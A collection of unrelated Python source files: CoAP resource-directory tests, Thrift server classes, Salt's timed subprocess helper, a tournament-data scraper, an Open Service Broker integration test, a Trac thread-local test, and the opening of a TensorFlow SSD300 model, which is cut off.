expected.code = defines.Codes.BAD_REQUEST.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_update_res_not_found(self):
print("Resource not found on update")
path = "rd/4521?con=coaps://new.example.com:5684"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.NOT_FOUND.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_delete_res_not_found(self):
print("Resource not found on delete")
path = "rd/4521"
req = Request()
req.code = defines.Codes.DELETE.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.NOT_FOUND.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_wildcard_res(self):
print("Use wildcard * to find resources")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
client.post(path, payload, None, None, **ct)
path = "rd?ep=node2&con=coap://[2001:db8:3::123]:61616"
payload = '</temp>;rt="temperature";anchor="coap://[2001:db8:3::123]:61616"'
client.post(path, payload, None, None, **ct)
client.stop()
path = "rd-lookup/res?rt=temp*"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '<coap://local-proxy-old.example.com:5683/sensors/temp>;ct=41;rt="temperature-c";' \
'if="sensor";anchor="coap://spurious.example.com:5683",' \
'<coap://[2001:db8:3::123]:61616/temp>;rt="temperature";' \
'anchor="coap://[2001:db8:3::123]:61616"'
self.current_mid += 1
self._test_check([(req, expected)])
def test_wildcard_ep(self):
print("Use wildcard * to find endpoints")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
loc_path1 = response.location_path
path = "rd?ep=node2&con=coap://[2001:db8:3::123]:61616"
payload = '</temp>;rt="temperature";anchor="coap://[2001:db8:3::123]:61616"'
response = client.post(path, payload, None, None, **ct)
loc_path2 = response.location_path
client.stop()
path = "rd-lookup/ep?rt=temp*"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '</' + loc_path1 + '>;con="coap://local-proxy-old.example.com:5683";ep="node1";lt=500,' \
'</' + loc_path2 + '>;con="coap://[2001:db8:3::123]:61616";' \
'ep="node2";lt=500'
self.current_mid += 1
self._test_check([(req, expected)])
if __name__ == '__main__':
unittest.main()
|
TServer.py
|
from six.moves import queue
import logging
import os
import threading
from thrift.protocol import TBinaryProtocol
from thrift.transport import TTransport
logger = logging.getLogger(__name__)
class TServer(object):
def __init__(self, *args):
if (len(args) == 2):
self.__initArgs__(args[0], args[1],
TTransport.TTransportFactoryBase(),
TTransport.TTransportFactoryBase(),
TBinaryProtocol.TBinaryProtocolFactory(),
TBinaryProtocol.TBinaryProtocolFactory())
elif (len(args) == 4):
self.__initArgs__(args[0], args[1], args[2], args[2], args[3], args[3])
elif (len(args) == 6):
self.__initArgs__(args[0], args[1], args[2], args[3], args[4], args[5])
def __initArgs__(self, processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory):
self.processor = processor
self.serverTransport = serverTransport
self.inputTransportFactory = inputTransportFactory
self.outputTransportFactory = outputTransportFactory
self.inputProtocolFactory = inputProtocolFactory
self.outputProtocolFactory = outputProtocolFactory
def serve(self):
pass
class TSimpleServer(TServer):
def __init__(self, *args):
TServer.__init__(self, *args)
def serve(self):
self.serverTransport.listen()
while True:
client = self.serverTransport.accept()
if not client:
continue
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException:
pass
except Exception as x:
logger.exception(x)
itrans.close()
otrans.close()
class TThreadedServer(TServer):
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.daemon = kwargs.get("daemon", False)
def serve(self):
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
if not client:
continue
t = threading.Thread(target=self.handle, args=(client,))
t.daemon = self.daemon
t.start()
except KeyboardInterrupt:
raise
except Exception as x:
logger.exception(x)
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException:
pass
except Exception as x:
logger.exception(x)
itrans.close()
otrans.close()
class TThreadPoolServer(TServer):
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.clients = queue.Queue()
self.threads = 10
self.daemon = kwargs.get("daemon", False)
def setNumThreads(self, num):
self.threads = num
def serveThread(self):
while True:
try:
client = self.clients.get()
self.serveClient(client)
except Exception as x:
logger.exception(x)
def serveClient(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException:
pass
except Exception as x:
logger.exception(x)
itrans.close()
otrans.close()
def serve(self):
for i in range(self.threads):
try:
t = threading.Thread(target=self.serveThread)
t.daemon = self.daemon
t.start()
except Exception as x:
logger.exception(x)
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
if not client:
continue
self.clients.put(client)
except Exception as x:
logger.exception(x)
class TForkingServer(TServer):
def __init__(self, *args):
TServer.__init__(self, *args)
self.children = []
def serve(self):
def try_close(file):
try:
file.close()
except IOError as e:
logger.warning(e, exc_info=True)
self.serverTransport.listen()
while True:
client = self.serverTransport.accept()
if not client:
continue
try:
pid = os.fork()
if pid:
self.children.append(pid)
self.collect_children()
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
try_close(itrans)
try_close(otrans)
else:
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
ecode = 0
try:
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException:
pass
except Exception as e:
logger.exception(e)
ecode = 1
finally:
try_close(itrans)
try_close(otrans)
os._exit(ecode)
except TTransport.TTransportException:
pass
except Exception as x:
logger.exception(x)
def collect_children(self):
while self.children:
try:
pid, status = os.waitpid(0, os.WNOHANG)
except OSError:
pid = None
if pid:
self.children.remove(pid)
else:
break
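# Typical wiring for the servers above (a sketch; `MyService` is a generated
# Thrift service module and `MyHandler` an implementation of its interface,
# neither of which is part of this file):
#
#     from thrift.transport import TSocket, TTransport
#     from thrift.protocol import TBinaryProtocol
#
#     processor = MyService.Processor(MyHandler())
#     transport = TSocket.TServerSocket(host="0.0.0.0", port=9090)
#     tfactory = TTransport.TBufferedTransportFactory()
#     pfactory = TBinaryProtocol.TBinaryProtocolFactory()
#
#     server = TThreadedServer(processor, transport, tfactory, pfactory,
#                              daemon=True)
#     server.serve()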
|
timed_subprocess.py
|
"""
For running command line executables with a timeout
"""
import shlex
import subprocess
import threading
import salt.exceptions
import salt.utils.data
import salt.utils.stringutils
class TimedProc:
"""
Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs
"""
def __init__(self, args, **kwargs):
self.wait = not kwargs.pop("bg", False)
self.stdin = kwargs.pop("stdin", None)
self.with_communicate = kwargs.pop("with_communicate", self.wait)
self.timeout = kwargs.pop("timeout", None)
self.stdin_raw_newlines = kwargs.pop("stdin_raw_newlines", False)
# If you're not willing to wait for the process
# you can't define any stdin, stdout or stderr
if not self.wait:
self.stdin = kwargs["stdin"] = None
self.with_communicate = False
elif self.stdin is not None:
if not self.stdin_raw_newlines:
# Translate a newline submitted as '\n' on the CLI to an actual
# newline character.
self.stdin = salt.utils.stringutils.to_bytes(
self.stdin.replace("\\n", "\n")
)
kwargs["stdin"] = subprocess.PIPE
if not self.with_communicate:
self.stdout = kwargs["stdout"] = None
self.stderr = kwargs["stderr"] = None
if self.timeout and not isinstance(self.timeout, (int, float)):
raise salt.exceptions.TimedProcTimeoutError(
"Error: timeout {} must be a number".format(self.timeout)
)
if kwargs.get("shell", False):
args = salt.utils.data.decode(args, to_str=True)
try:
self.process = subprocess.Popen(args, **kwargs)
except (AttributeError, TypeError):
if not kwargs.get("shell", False):
if not isinstance(args, (list, tuple)):
try:
args = shlex.split(args)
except AttributeError:
args = shlex.split(str(args))
str_args = []
for arg in args:
if not isinstance(arg, str):
str_args.append(str(arg))
else:
str_args.append(arg)
args = str_args
else:
if not isinstance(args, (list, tuple, str)):
# Handle corner case where someone does a 'cmd.run 3'
args = str(args)
# Ensure that environment variables are strings
for key, val in kwargs.get("env", {}).items():
if not isinstance(val, str):
kwargs["env"][key] = str(val)
if not isinstance(key, str):
kwargs["env"][str(key)] = kwargs["env"].pop(key)
args = salt.utils.data.decode(args)
self.process = subprocess.Popen(args, **kwargs)
self.command = args
def run(self):
"""
wait for subprocess to terminate and return subprocess' return code.
If timeout is reached, throw TimedProcTimeoutError
"""
def receive():
if self.with_communicate:
self.stdout, self.stderr = self.process.communicate(input=self.stdin)
elif self.wait:
self.process.wait()
if not self.timeout:
receive()
else:
rt = threading.Thread(target=receive)
rt.start()
rt.join(self.timeout)
if rt.is_alive():
# Subprocess cleanup (best effort)
self.process.kill()
def terminate():
if rt.is_alive():
self.process.terminate()
threading.Timer(10, terminate).start()
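# If kill() above has not ended the process, the delayed terminate() is a
# last best-effort cleanup; the timeout error below is raised immediately
# either way.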
raise salt.exceptions.TimedProcTimeoutError(
"{} : Timed out after {} seconds".format(
self.command, str(self.timeout),
)
)
return self.process.returncode
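# Minimal usage sketch (illustrative, not part of the module above): run a
# command with a 5 second budget and capture its output.
#
#     proc = TimedProc(
#         ["sleep", "10"],
#         timeout=5,
#         stdout=subprocess.PIPE,
#         stderr=subprocess.PIPE,
#     )
#     try:
#         rc = proc.run()          # returns the exit code on success
#     except salt.exceptions.TimedProcTimeoutError:
#         rc = None                # the child was killed after 5 seconds
#     # proc.stdout / proc.stderr hold the captured output after a
#     # successful run() when with_communicate is in effect.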
|
get_data.py
|
import requests
import csv
import time
import json
from collections import *
from api_scrape_util import *
import threading
import sys
def get_data(slug, suppress_output):
tourn_info = get_tournament_info(slug)
event_phases = tourn_info['phases_per_event']
phase_groups = tourn_info['groups_per_phase']
#Separate each phase by game
events = {}
for event_id in event_phases:
r = requests.get(format_url(api_prefix, 'event/', str(event_id), api_entrant_postfix))
evnt_data = json.loads(r.text)
events[evnt_data["entities"]["event"]["id"]] = Event(event_id, evnt_data["entities"]["event"]["name"], evnt_data["entities"]["event"]["videogameId"], evnt_data["entities"]["event"]["type"])
tmp = evnt_data["entities"]["entrants"]
events[evnt_data["entities"]["event"]["id"]].add_entrants(tmp)
#At this point, we've scraped all events, phases, and entrants
#print("Retrieved events")
for event in events:
events[event].add_phases(event_phases[event])
for phase in events[event].phases:
events[event].add_groups(phase_groups[phase])
for event in events:
#Uses the skip criteria defined in skip_event to check if we care about this event.
if(skip_event(events, event)):
continue
#Update the master tournament file
master_file = "../data/" + events[event].game + "/" + events[event].format + "/tournaments.csv"
master_lock.acquire()
update_master_file(master_file,slug, tourn_info['name'], tourn_info['dates'], events[event])
master_lock.release()
#Update the sets file
filename = get_filename(events[event].game, events[event].format,slug,'-sets.csv')
if(not suppress_output):
print("Working on " + filename + "...")
doubles = write_set_data(filename, events[event], suppress_output)
#Update the standings file
filename = get_filename(events[event].game, events[event].format,slug,'-standings.csv')
write_placements(filename, events[event], doubles)
if(suppress_output):
slug_lock.acquire()
all_slugs.pop(slug, None)
slug_lock.release()
#Declare all needed threads and locks
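#master_lock serializes updates to the shared tournaments.csv master files,
#while slug_lock guards all_slugs, the dict of tournaments still in flight
#(whatever remains in it at the end is reported as errored).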
threads = []
all_slugs = {}
master_lock = threading.RLock()
slug_lock = threading.RLock()
def Single():
slug = input("What is the tournament slug?\n")
get_data(slug, False)
def Multi():
#Open the slugs file to read all tournaments to scrape
slug_file = "../data/slugs.csv"
f = open(slug_file,"r")
reader = csv.reader(f)
slug_list = list(reader)
f.close()
iterations = len(slug_list[1::])
for i in range(1,iterations + 1):
slug = slug_list[i][1]
slug_lock.acquire()
all_slugs[slug] = slug
#print("Starting Tournament: ", slug)
slug_lock.release()
#Create a thread to grab data, suppress output
t = threading.Thread(target=get_data, args=(slug,True))
threads.append(t)
t.start()
#Print the remaining threads, and check every half second.
while(threading.active_count() != 1):
sys.stdout.write("Threads Remaining: {0}\r".format(threading.active_count()))
sys.stdout.flush()
time.sleep(0.5)
for thread in threads:
thread.join()
print("Error'd files: ", all_slugs)
mode = input("Single Mode (s)? Or File Mode (f)?\n")
valid = False
if(mode == "s"):
Single()
valid = True
if(mode == "f"):
Multi()
valid = True
if(not valid):
print("Please select a valid mode and rerun.")
|
test_integration_using_async_flow.py
|
import json
import time
from http import HTTPStatus
from threading import Thread
from typing import Union, List, Optional
from unittest import TestCase
from uuid import uuid4
import requests
from requests.auth import HTTPBasicAuth
from openbrokerapi import api, errors
from openbrokerapi.catalog import ServicePlan
from openbrokerapi.service_broker import (
ServiceBroker,
Service,
ProvisionDetails,
ProvisionedServiceSpec,
ProvisionState,
LastOperation,
OperationState,
DeprovisionDetails,
DeprovisionServiceSpec,
BindDetails,
Binding,
BindState,
UnbindDetails,
UnbindSpec,
GetInstanceDetailsSpec,
GetBindingSpec)
class FullBrokerTestCase(TestCase):
def setUp(self) -> None:
broker_username = str(uuid4())
broker_password = str(uuid4())
self.request_ads = {
'auth': HTTPBasicAuth(broker_username, broker_password),
'headers': {'X-Broker-Api-Version': '2.15', 'Content-Type': 'application/json'}
}
self.service_guid = str(uuid4())
self.plan_guid = str(uuid4())
self.broker = InMemoryBroker(self.service_guid, self.plan_guid)
def run_server():
api.serve(self.broker, api.BrokerCredentials(broker_username, broker_password), port=5001)
# self.server = Process(target=run_server)
self.server = Thread(target=run_server)
self.server.daemon = True
self.server.start()
time.sleep(2)
def test_lifecycle(self):
# GIVEN
org_guid = str(uuid4())
space_guid = str(uuid4())
instance_guid = str(uuid4())
binding_guid = str(uuid4())
# CATALOG
self.check_catalog(self.service_guid, self.plan_guid)
# ASYNC PROVISION
operation = self.check_provision(instance_guid, org_guid, space_guid, self.service_guid, self.plan_guid)
self.check_last_operation_after_provision(instance_guid, operation)
# GET INSTANCE
self.check_instance_retrievable(instance_guid)
# ASYNC BIND
operation = self.check_bind(binding_guid, instance_guid)
self.check_last_operation_after_bind(binding_guid, instance_guid, operation)
# GET BINDING
response = requests.get(
"http://localhost:5001/v2/service_instances/{}/service_bindings/{}".format(instance_guid, binding_guid),
**self.request_ads)
self.assertEqual(HTTPStatus.OK, response.status_code)
self.assertDictEqual({}, response.json())
# ASYNC UNBIND
operation = self.check_unbind(binding_guid, instance_guid)
self.check_last_operation_after_unbind(binding_guid, instance_guid, operation)
# ASYNC DEPROVISION
operation = self.check_deprovision(instance_guid, operation)
self.check_last_operation_after_deprovision(instance_guid, operation)
# DEPROVISION TWICE
self.check_deprovision_after_deprovision_done(instance_guid)
def check_instance_retrievable(self, instance_guid):
response = requests.get(
"http://localhost:5001/v2/service_instances/{}".format(instance_guid), **self.request_ads)
self.assertEqual(HTTPStatus.OK, response.status_code)
self.assertEqual(self.service_guid, response.json()['service_id'])
self.assertEqual(self.plan_guid, response.json()['plan_id'])
def check_unbind(self, binding_guid, instance_guid):
response = requests.delete(
"http://localhost:5001/v2/service_instances/{}/service_bindings/{}".format(instance_guid, binding_guid),
params={
"service_id": self.service_guid,
"plan_id": self.plan_guid,
'accepts_incomplete': 'true'
},
**self.request_ads
)
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
operation = response.json().get('operation')
self.assertEqual('unbind', operation)
return operation
def check_last_operation_after_bind(self, binding_guid, instance_guid, operation):
response = requests.get(
'http://localhost:5001/v2/service_instances/{}/service_bindings/{}/last_operation'.format(instance_guid,
binding_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'operation': operation,
},
**self.request_ads)
self.assertEqual(HTTPStatus.OK, response.status_code)
self.assertEqual('succeeded', response.json()['state'])
def check_last_operation_after_unbind(self, binding_guid, instance_guid, operation):
response = requests.get(
'http://localhost:5001/v2/service_instances/{}/service_bindings/{}/last_operation'.format(instance_guid,
binding_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'operation': operation,
},
**self.request_ads)
self.assertEqual(HTTPStatus.OK, response.status_code)
self.assertEqual('succeeded', response.json()['state'])
def check_bind(self, binding_guid, instance_guid):
response = requests.put(
"http://localhost:5001/v2/service_instances/{}/service_bindings/{}?accepts_incomplete=true".format(
instance_guid, binding_guid),
data=json.dumps({
"service_id": self.service_guid,
"plan_id": self.plan_guid
}),
**self.request_ads
)
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
operation = response.json().get('operation')
self.assertEqual('bind', operation)
return operation
def check_deprovision_after_deprovision_done(self, instance_guid):
response = requests.delete(
"http://localhost:5001/v2/service_instances/{}".format(instance_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'accepts_incomplete': 'true'
},
**self.request_ads)
self.assertEqual(HTTPStatus.GONE, response.status_code)
def check_deprovision(self, instance_guid, operation):
response = requests.delete(
"http://localhost:5001/v2/service_instances/{}".format(instance_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'accepts_incomplete': 'true'
},
**self.request_ads)
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
operation = response.json()['operation']
self.assertEqual('deprovision', operation)
return operation
def check_last_operation_after_deprovision(self, instance_guid, operation):
response = requests.get(
"http://localhost:5001/v2/service_instances/{}/last_operation".format(instance_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'operation': operation
},
**self.request_ads)
self.assertEqual(HTTPStatus.GONE, response.status_code)
self.assertEqual('succeeded', response.json()['state'])
def check_last_operation_after_provision(self, instance_guid, operation):
response = requests.get(
"http://localhost:5001/v2/service_instances/{}/last_operation".format(instance_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'operation': operation
},
**self.request_ads)
self.assertEqual(HTTPStatus.OK, response.status_code)
self.assertEqual('succeeded', response.json()['state'])
def check_provision(self, instance_guid, org_guid, space_guid, service_guid, plan_guid):
response = requests.put(
"http://localhost:5001/v2/service_instances/{}?accepts_incomplete=true".format(instance_guid),
data=json.dumps({
"organization_guid": org_guid,
"space_guid": space_guid,
"service_id": service_guid,
"plan_id": plan_guid,
# "context": {
# "organization_guid": "org-guid-here",
# "space_guid": "space-guid-here",
# }
}),
**self.request_ads)
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
operation = response.json().get('operation')
self.assertEqual('provision', operation)
return operation
def check_catalog(self, service_guid, plan_guid):
response = requests.get('http://localhost:5001/v2/catalog', **self.request_ads)
catalog = response.json()
self.assertEqual(HTTPStatus.OK, response.status_code)
# find service
for service in catalog['services']:
if service['name'] == 'InMemService':
break
else:
service = None
self.assertIsNotNone(service)
self.assertEqual(service_guid, service.get('id'))
self.assertTrue(service.get('instances_retrievable'))
self.assertTrue(service.get('bindings_retrievable'))
# find plan
for plan in service['plans']:
if plan['name'] == 'standard':
break
else:
plan = None
self.assertIsNotNone(plan)
self.assertEqual(plan_guid, plan.get('id'))
class InMemoryBroker(ServiceBroker):
CREATING = 'CREATING'
CREATED = 'CREATED'
BINDING = 'BINDING'
BOUND = 'BOUND'
UNBINDING = 'UNBINDING'
DELETING = 'DELETING'
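# Instance lifecycle as driven by the async polling endpoints:
# provision -> CREATING, last_operation flips CREATING -> CREATED;
# bind -> BINDING, last_binding_operation flips BINDING -> BOUND;
# unbind -> UNBINDING, last_binding_operation flips UNBINDING -> CREATED;
# deprovision -> DELETING, last_operation then removes the instance.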
def __init__(self, service_guid, plan_guid):
self.service_guid = service_guid
self.plan_guid = plan_guid
self.service_instances = dict()
def catalog(self) -> Union[Service, List[Service]]:
return Service(
id=self.service_guid,
name='InMemService',
description='InMemService',
bindable=True,
plans=[
ServicePlan(
id=self.plan_guid,
name='standard',
description='standard plan',
free=False,
)
],
instances_retrievable=True,
bindings_retrievable=True
)
def provision(self,
instance_id: str,
details: ProvisionDetails,
async_allowed: bool,
**kwargs) -> ProvisionedServiceSpec:
if not async_allowed:
raise errors.ErrAsyncRequired()
self.service_instances[instance_id] = {
'provision_details': details,
'state': self.CREATING
}
return ProvisionedServiceSpec(
state=ProvisionState.IS_ASYNC,
operation='provision'
)
def bind(self, instance_id: str, binding_id: str, details: BindDetails, async_allowed: bool, **kwargs) -> Binding:
if not async_allowed:
raise errors.ErrAsyncRequired()
instance = self.service_instances.get(instance_id, {})
if instance and instance.get('state') == self.CREATED:
instance['state'] = self.BINDING
return Binding(BindState.IS_ASYNC, operation='bind')
def unbind(self, instance_id: str, binding_id: str, details: UnbindDetails, async_allowed: bool,
**kwargs) -> UnbindSpec:
if not async_allowed:
raise errors.ErrAsyncRequired()
instance = self.service_instances.get(instance_id, {})
if instance and instance.get('state') == self.BOUND:
instance['state'] = self.UNBINDING
return UnbindSpec(True, 'unbind')
def deprovision(self, instance_id: str, details: DeprovisionDetails, async_allowed: bool,
**kwargs) -> DeprovisionServiceSpec:
if not async_allowed:
raise errors.ErrAsyncRequired()
instance = self.service_instances.get(instance_id)
if instance is None:
raise errors.ErrInstanceDoesNotExist()
if instance.get('state') == self.CREATED:
instance['state'] = self.DELETING
return DeprovisionServiceSpec(True, 'deprovision')
def last_operation(self, instance_id: str, operation_data: Optional[str], service_id: Optional[str], plan_id: Optional[str], **kwargs) -> LastOperation:
instance = self.service_instances.get(instance_id)
if instance is None:
raise errors.ErrInstanceDoesNotExist()
if instance.get('state') == self.CREATING:
instance['state'] = self.CREATED
return LastOperation(OperationState.SUCCEEDED)
elif instance.get('state') == self.DELETING:
del self.service_instances[instance_id]
raise errors.ErrInstanceDoesNotExist()
def last_binding_operation(self,
instance_id: str,
binding_id: str,
operation_data: Optional[str],
service_id: Optional[str],
plan_id: Optional[str],
**kwargs
) -> LastOperation:
instance = self.service_instances.get(instance_id, {})
if instance.get('state') == self.BINDING:
instance['state'] = self.BOUND
return LastOperation(OperationState.SUCCEEDED)
elif instance.get('state') == self.UNBINDING:
instance['state'] = self.CREATED
return LastOperation(OperationState.SUCCEEDED)
def get_instance(self, instance_id: str, **kwargs) -> GetInstanceDetailsSpec:
instance = self.service_instances.get(instance_id)
if instance is None:
raise errors.ErrInstanceDoesNotExist()
return GetInstanceDetailsSpec(
self.service_guid,
self.plan_guid
)
def get_binding(self, instance_id: str, binding_id: str, **kwargs) -> GetBindingSpec:
instance = self.service_instances.get(instance_id)
if instance is None:
raise errors.ErrInstanceDoesNotExist()
if instance.get('state') == self.BOUND:
return GetBindingSpec()
|
concurrency.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010-2018 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import threading
import unittest
from trac.util.concurrency import ThreadLocal
class ThreadLocalTestCase(unittest.TestCase):
def test_thread_local(self):
local = ThreadLocal(a=1, b=2)
local.b = 3
local.c = 4
local_dict = [local.__dict__.copy()]
def f():
local.b = 5
local.d = 6
local_dict.append(local.__dict__.copy())
thread = threading.Thread(target=f)
thread.start()
thread.join()
self.assertEqual(dict(a=1, b=3, c=4), local_dict[0])
self.assertEqual(dict(a=1, b=5, d=6), local_dict[1])
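# The second thread starts from the constructor defaults (a=1, b=2); the
# main thread's later writes (b=3, c=4) are not visible to it, and its own
# writes (b=5, d=6) do not leak back.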
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ThreadLocalTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
ssd_model.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SSD300 Model Configuration.
References:
Wei Liu, Dragomir Anguelov, Dumitru Erhan, Christian Szegedy, Scott Reed,
Cheng-Yang Fu, Alexander C. Berg
SSD: Single Shot MultiBox Detector
arXiv:1512.02325
Ported from MLPerf reference implementation:
https://github.com/mlperf/reference/tree/ssd/single_stage_detector/ssd
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import re
import threading
import tensorflow.compat.v1 as tf
# pylint: disable=g-direct-tensorflow-import
import constants
import mlperf
import ssd_constants
from cnn_util import log_fn
from models import model as model_lib
from models import resnet_model
from tensorflow.contrib import layers as contrib_layers
from tensorflow.python.ops import variables
BACKBONE_MODEL_SCOPE_NAME = 'resnet34_backbone'
class SSD300Model(model_lib.CNNModel):
"""Single Shot Multibox Detection (SSD) model for 300x300 image datasets."""
def __init__(self, label_num=ssd_constants.NUM_CLASSES, batch_size=32,
learning_rate=1e-3, backbone='resnet34', params=None):
super(SSD300Model, self).__init__('ssd300', 300, batch_size, learning_rate,
params=params)
# For COCO dataset, 80 categories + 1 background = 81 labels
self.label_num = label_num
# Currently only support ResNet-34 as backbone model
if backbone != 'resnet34':
raise ValueError('Invalid backbone model %s for SSD.' % backbone)
mlperf.logger.log(key=mlperf.tags.BACKBONE, value=backbone)
# Number of channels and default boxes associated with the following layers:
# ResNet34 layer, Conv7, Conv8_2, Conv9_2, Conv10_2, Conv11_2
self.out_chan = [256, 512, 512, 256, 256, 256]
mlperf.logger.log(key=mlperf.tags.LOC_CONF_OUT_CHANNELS,
value=self.out_chan)
# Number of default boxes from layers of different scales
# 38x38x4, 19x19x6, 10x10x6, 5x5x6, 3x3x4, 1x1x4
self.num_dboxes = [4, 6, 6, 6, 4, 4]
mlperf.logger.log(key=mlperf.tags.NUM_DEFAULTS_PER_CELL,
value=self.num_dboxes)
# TODO(haoyuzhang): in order to correctly restore in replicated mode, need
# to create a saver for each tower before graph is finalized. Use variable
# manager for better efficiency.
self.backbone_savers = []
# Collected predictions for eval stage. It maps each image id in eval
# dataset to a dict containing the following information:
# source_id: raw ID of image
# raw_shape: raw shape of image
# pred_box: encoded box coordinates of prediction
# pred_scores: scores of classes in prediction
self.predictions = {}
# Global step when predictions are collected.
self.eval_global_step = 0
# Average precision. In asynchronous eval mode, this is the latest AP we
# get so far and may not be the results at current eval step.
self.eval_coco_ap = 0
# Process, queues, and thread for asynchronous evaluation. When enabled,
# create a separate process (async_eval_process) that continuously pull
# intermediate results from the predictions queue (a multiprocessing queue),
# process them, and push final results into results queue (another
# multiprocessing queue). The main thread is responsible to push messages
# into predictions queue, and start a separate thread to continuously pull
# messages from results queue to update final results.
# Message in predictions queue should be a tuple of two elements:
# (evaluation step, predictions)
# Message in results queue should be a tuple of two elements:
# (evaluation step, final results)
self.async_eval_process = None
self.async_eval_predictions_queue = None
self.async_eval_results_queue = None
self.async_eval_results_getter_thread = None
# The MLPerf reference uses a starting lr of 1e-3 at bs=32.
self.base_lr_batch_size = 32
def skip_final_affine_layer(self):
return True
def gpu_preprocess_nhwc(self, images, phase_train=True):
try:
import ssd_dataloader # pylint: disable=g-import-not-at-top
except ImportError:
raise ImportError('To use the COCO dataset, you must clone the '
'repo https://github.com/tensorflow/models and add '
'tensorflow/models and tensorflow/models/research to '
'the PYTHONPATH, and compile the protobufs by '
'following https://github.com/tensorflow/models/blob/'
'master/research/object_detection/g3doc/installation.md'
'#protobuf-compilation ; To evaluate using COCO '
'metric, download and install Python COCO API from '
'https://github.com/cocodataset/cocoapi')
if phase_train:
images = ssd_dataloader.color_jitter(
images, brightness=0.125, contrast=0.5, saturation=0.5, hue=0.05)
images = ssd_dataloader.normalize_image(images)
return images
def add_backbone_model(self, cnn):
# --------------------------------------------------------------------------
# Resnet-34 backbone model -- modified for SSD
# --------------------------------------------------------------------------
